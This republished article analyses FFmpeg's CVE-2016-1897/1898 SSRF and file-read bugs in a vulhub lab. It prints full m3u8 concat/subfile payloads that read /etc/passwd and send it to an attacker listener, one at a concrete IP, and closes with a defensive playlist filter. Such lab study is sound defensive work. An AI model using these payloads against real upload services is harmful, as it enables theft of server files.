
Example Analysis of SSRF, an arbitrary File Reading vulnerability in ffmpeg

2025-01-15 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

The editor shares with you an example analysis of the ffmpeg arbitrary file read / SSRF vulnerability. I believe most people do not know much about it, so this article is shared for your reference; I hope you will learn a lot from reading it. Let's get to know it!

For reference, study and use only

FFmpeg arbitrary file read vulnerability / SSRF vulnerability (CVE-2016-1897/CVE-2016-1898)

Port: 8090

FFmpeg is an open source program that can record and convert digital audio and video, and turn it into a stream. It is very powerful and is an indispensable multimedia file processing program for every video website.

Improper handling of m3u8 files when parsing HTTP Live Streaming media in FFmpeg 2.x can lead to SSRF and arbitrary file read vulnerabilities. The vulnerability is triggered when a website allows users to upload multimedia files and processes them with FFmpeg.

This vulnerability has two CVE numbers, CVE-2016-1897 and CVE-2016-1898, which differ in how many lines of the file can be read: CVE-2016-1897 can only read the first line of the file, while CVE-2016-1898 can read any line. The underlying principle is basically the same.

Affected versions

FFmpeg 2.8.x < 2.8.5
FFmpeg 2.7.x < 2.7.5
FFmpeg 2.6.x < 2.6.7
FFmpeg 2.5.x < 2.5.10

This vulnerability is mainly caused by ffmpeg's improper handling of m3u8 files. The details of the underlying principle are not repeated here; refer to the following links:

Principle

http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8%20-%20FFMpeg%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html
http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
https://habr.com/en/company/mailru/blog/274855/

Vulnerable environment

The following test environment uses the vulhub docker image; here is Master P's link: https://github.com/vulhub/vulhub

Start the test environment:

docker-compose up -d

Once it is running, visit the corresponding URL and port and you will see a video upload interface.

Looking at the backend PHP source, it simply calls the ffmpeg -i command, so if you have not deployed the docker image you can instead install ffmpeg directly and perform the conversion with ffmpeg.

Vulnerability reproduction

First we construct a malicious m3u8 file (written in Notepad and saved with the .m3u8 extension):

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://X.X.X.X:9999/test.txt
#EXT-X-ENDLIST

Explanation of each tag:

#EXTM3U is the m3u8 file header; this line must come first.
#EXT-X-MEDIA-SEQUENCE indicates that each media URI has a unique sequence number in the playlist, increasing by 1 between adjacent entries.
#EXTINF:10.0, gives the duration of the TS segment.
#EXT-X-ENDLIST is equivalent to an end-of-file marker.

These are the most basic m3u8 tags. The problem is that when FFmpeg requests the TS segment (URL), it does not check the stream address inside it and requests it directly.

The server listens on the port:

Since external data can be requested, we can try out-of-band SSRF. From the references, ffmpeg has an internal concat function, so we can splice internal data together via concat and bring it out of band (OOB).

If concat is used directly it only makes a normal request, so we need some small tricks to bring the local file out.

First, we need to create an error.txt on the web server, whose content is in m3u8 format but does not contain the end-of-file marker.

Second, we create a malicious m3u8 file (or one with an avi, mp4 or similar extension) whose content splices the local file /etc/passwd via concat.

Finally, we upload this malicious m3u8 file. The reference file contents are as follows:

error.txt

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://X.X.X.X:9999/?

upload.m3u8

#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:10.0,
concat:http://X.X.X.X:8989/error.txt|file:///etc/passwd
#EXT-X-ENDLIST

Deploy error.txt on the web server:

Upload malicious m3u8 files:

At the same time, VPS listens on port 9999:

Note:

The above files need to be edited and saved with Notepad using the default UTF-8 format. When you try to create them with vim, reproduction always fails.

Special thanks to the author of the following link for providing the solution: https://blog.safebuff.com/2016/05/12/CVE-2016-1897-8-FFMpeg%E6%BC%8F%E6%B4%9E%E5%BA%94%E6%80%A5%E5%88%86%E6%9E%90/

Because the backend keeps transcoding after the upload, the process hangs and the page does not respond. You need to enter the docker container and manually kill the ffmpeg process.

With the above method you will find that only the first line of /etc/passwd can be extracted; the rest of the content is still not read, so we make further use of other functions. FFmpeg also provides the subfile function, where start is followed by the byte offset at which the slice begins and end by the offset at which it ends.

Only the malicious upload.m3u8 file needs to be modified:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://47.99.191.76:8989/error.txt|subfile,start,0,end,31,:///etc/passwd|subfile,start,32,end,79,:///etc/passwd
#EXT-X-ENDLIST

While testing with gradually increasing subfile offsets, it was found that once the length exceeds a certain point, the amount of data read no longer grows. I guessed it might be related to URL length or to newline characters.

After continued testing it finally turned out that this has nothing to do with URL length or the m3u8 request URL, and there is no 32-byte limit. In fact, concat cannot include newline characters when joining URLs. The newline character \n occupies one byte in the stored /etc/passwd file, so whether reading through the file protocol or through subfile slices, reading is interrupted as soon as a \n is reached and the content after it cannot be output.

Following this idea, we simply skip the \n character when reading the file through subfile, adjusting the offsets step by step according to the returned data until the complete data is read. Taking the following /etc/passwd file as an example, the payload reference is attached:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:101::/var/run/dbus:/bin/false

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://47.99.191.76:8989/error.txt|subfile,start,0,end,31,:///etc/passwd|subfile,start,32,end,79,:///etc/passwd|subfile,start,80,end,116,:///etc/passwd|subfile,start,117,end,153,:///etc/passwd|subfile,start,154,end,188,:///etc/passwd|subfile,start,189,end,236,:///etc/passwd|subfile,start,237,end,284,:///etc/passwd|subfile,start,285,end,329,:///etc/passwd|subfile,start,330,end,373,:///etc/passwd|subfile,start,374,end,423,:///etc/passwd|subfile,start,424,end,475,:///etc/passwd|subfile,start,476,end,518,:///etc/passwd|subfile,start,519,end,571,:///etc/passwd|subfile,start,572,end,624,:///etc/passwd|subfile,start,625,end,686,:///etc/passwd|subfile,start,687,end,735,:///etc/passwd|subfile,start,736,end,817,:///etc/passwd|subfile,start,818,end,876,:///etc/passwd|subfile,start,877,end,918,:///etc/passwd|subfile,start,919,end,965,:///etc/passwd
#EXT-X-ENDLIST

Finally read out all the data:
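As an added defender's example (not code from this article, from vulhub or from FFmpeg), the Python filter below is the kind of pre-check an upload handler should run on a user-supplied playlist before passing it to ffmpeg -i. It walks every URI line, splits concat chains on '|', and rejects any piece whose protocol is not on a small allowlist, which catches the concat:, subfile and file: primitives used in the payloads above. The sample playlists and the host attacker.invalid are constructed for the demonstration.

```python
import re

# Constructed sample playlists: one benign HLS playlist and one shaped like
# the concat/subfile payload discussed in the article (host is a placeholder).
BENIGN = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
segment0.ts
#EXT-X-ENDLIST
"""

MALICIOUS = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://attacker.invalid:8989/error.txt|subfile,start,0,end,31,:///etc/passwd
#EXT-X-ENDLIST
"""

# Relative segment names or https URIs are all an uploaded playlist needs;
# every other ffmpeg protocol (file, concat, subfile, pipe, data, ...) becomes
# an SSRF or local-read primitive once the server dereferences it.
ALLOWED_SCHEMES = {"https"}
# An ffmpeg protocol name ends with ':' (file:///x) or ',' (subfile,start,...).
PROTO_RE = re.compile(r"^([a-z][a-z0-9+.-]*)[:,]")

def playlist_findings(text: str) -> list:
    """Return (line_no, reason) for every URI line a safe uploader must reject."""
    findings = []
    lines = text.splitlines()
    if not lines or lines[0].strip() != "#EXTM3U":
        findings.append((1, "missing #EXTM3U header"))
    for no, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # tag lines carry no URI
        # concat: joins sub-URIs with '|'; inspect every piece separately
        for part in line.split("|"):
            m = PROTO_RE.match(part.lower())
            if m and m.group(1) not in ALLOWED_SCHEMES:
                findings.append((no, f"disallowed protocol {m.group(1)!r}"))
            elif not m and (part.startswith("/") or ".." in part):
                findings.append((no, "absolute or traversing local path"))
        if "|" in line:
            findings.append((no, "'|' separator: concat/subfile chaining"))
    return findings

def is_safe_playlist(text: str) -> bool:
    return not playlist_findings(text)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, "->", playlist_findings(doc) or "ok")
```

Current FFmpeg also accepts -protocol_whitelist (for example -protocol_whitelist https,tcp,tls) to restrict which protocols a playlist may reference; combine it with input validation like the above rather than relying on either alone.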

The above is the entire content of the article "Example Analysis of SSRF, an arbitrary File Reading vulnerability in ffmpeg". Thank you for reading! I believe everyone now has a certain understanding of it, and I hope the content shared here helps you. If you want to learn more, welcome to follow the industry information channel!
